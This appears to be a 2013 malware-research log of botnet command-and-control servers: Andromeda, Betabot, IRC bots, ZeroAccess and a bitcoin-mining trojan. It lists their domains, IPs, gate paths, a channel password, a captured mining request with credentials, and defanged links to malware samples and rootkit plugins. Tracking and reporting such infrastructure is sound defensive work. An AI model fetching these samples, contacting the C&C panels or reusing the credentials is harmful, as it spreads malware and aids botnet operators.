URL: hxxp://btcguild.com:8332/
hxxp://btcguild.com:8332 -u chakan_1 -p 123
hxxp://btcguild.com:8332 -u graskla_1 -p 123
DATA:
POST / HTTP/1.1
Authorization: Basic Y2hha2FuXzE6MTIz
Content-Length: 43
User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 3)
Host: btcguild.com:8332
Cache-Control: no-cache
{"method": "getwork", "params": [], "id":0}
Actions Detected:
Creates autorun records
Injects code into other processes
Patches system files
Samples:
hardstunt.com (Andromeda http botnet proxied by cloudflare.com)
Resolved hardstunt.com to 108.162.198.113, 108.162.199.113
Server: hardstunt.com
Gate file: /blob/image.php
Hosting a botnet behind CloudFlare seems like a bad idea. Let's see if I can get this blocked.
EDIT: CloudFlare received your malware report dated April 28, 2013 regarding: hardstunt.com. Please be aware CloudFlare is a network provider offering a reverse proxy, pass-through security service. We
crispershf.hc0.me (Andromeda http botnet hosted by Ecatel.net)
Resolved crispershf.hc0.me to 80.82.69.144
Server: crispershf.hc0.me
Gate file: /panel/image.php
Hosting infos: http://whois.domaintools.com/80.82.69.144
fearboot.com (Andromeda http botnet hosted by vmbox.co)
Resolved fearboot.com to 198.20.67.10
Server: fearboot.com
Gate file: /andro/image.php
Visit http://fearboot.com/p.php or http://fearboot.com/phpinfo.php for information about the server.
Hosting infos: http://whois.domaintools.com/198.20.67.10
x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)
Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208
Server: x01bkr2.biz
Port: 4723
Channel: #o.O
Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd
Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013
The Skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg
Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz
Hosting infos: http://whois.domaintools.com/94.242.237.128
Hosting infos: http://whois.domaintools.com/37.221.170.208
EDIT: snk is now desperately
199.168.136.116 (Andromeda hosted in United States, Scranton, Volumedrive)
Panel: hxxp://199.168.136.116/andro/image.php
Plugins:
hxxp://199.168.136.116/andro/r.pack
hxxp://199.168.136.116/andro/s.pack
hxxp://199.168.136.116/andro/f.pack
The Andromeda path requires a username and password: hxxp://199.168.136.116/andro/
Other: http://199.168.136.116/andro/fg.php?id=1880376902
Sample: hxxp://199.168.136.116/andro/and.exe
Hosting infos: http://whois.domaintools.com/199.168.136.116
firecrypt.net (Betabot http botnet hosted by alibabahost.com)
Resolved firecrypt.net to 37.221.165.124
Server: firecrypt.net
Gate file: /BetaBot/order.php
Alternate domains: rankedgaming.co iphone-giveaways.com
Hosting infos: http://whois.domaintools.com/37.221.165.124
37.235.49.168 (IRC botnet hosted by edis.at)
Server: 37.235.49.168
Port: 443
Channel: #test5
Channel password: :godlol
Topic for #test5 is: hacked by team whitehats
Topic for #test5 set by Sabu at Tue Apr 23 15:14:29 2013
Example bot nick: zwin-JJNEXJ|1952|
Opers:
[Sabu] (ryan@dildos): ryan
[Sabu] @#test5 @#opers @##fuckstamp #chats
[Sabu] irc1.molten-wow.com :mw_customer_ircd
[Sabu] is a Network Administrator
[Sabu] is available for help.
[Sabu] sysop
[Sabu] idle 16:59:16,
kryptic.me (Andromeda http botnet hosted by alibabahost.com)
Resolved kryptic.me to 37.221.170.234
Server: kryptic.me
Gate file: /jackson/gate.php
Plugins:
Rootkit: hxxp://krytical.me/jackson/plugins/rk_666604bd.mod
Alternate domain: krytical.me
Hosting infos: http://whois.domaintools.com/37.221.170.234
xlotxdxtorwfmvuzfuvtspel.com (ZeroAccess hosted in United States, San Antonio, Rackspace Cloud Servers)
Domain used: xlotxdxtorwfmvuzfuvtspel.com
166.78.144.80
Strings from the sample (path separators lost in extraction, restored here):
C:\WINDOWS\system32\rsaenh.dll
\systemroot
C:\RECYCLER
C:\RECYCLER\S-1-5-21-1547161642-507921405-839522115-1004
C:\RECYCLER\S-1-5-21-1547161642-507921405-839522115-1004\$e0da97a6dd053ef45a7e44d9077fa7d5
L U @ n
ACPI#PNP0303#2&da1a3ff&0
d2cd4bfe
C:\RECYCLER\S-1-5-18
C:\RECYCLER\S-1-5-18\$e0da97a6dd053ef45a7e44d9077fa7d5
C:\DOCUME~1\User\LOCALS~1\Temp\1 (1).exe
\PIPE\wkssvc
C:\
Sample here
Hosting infos: http://whois.domaintools.com/166.78.144.80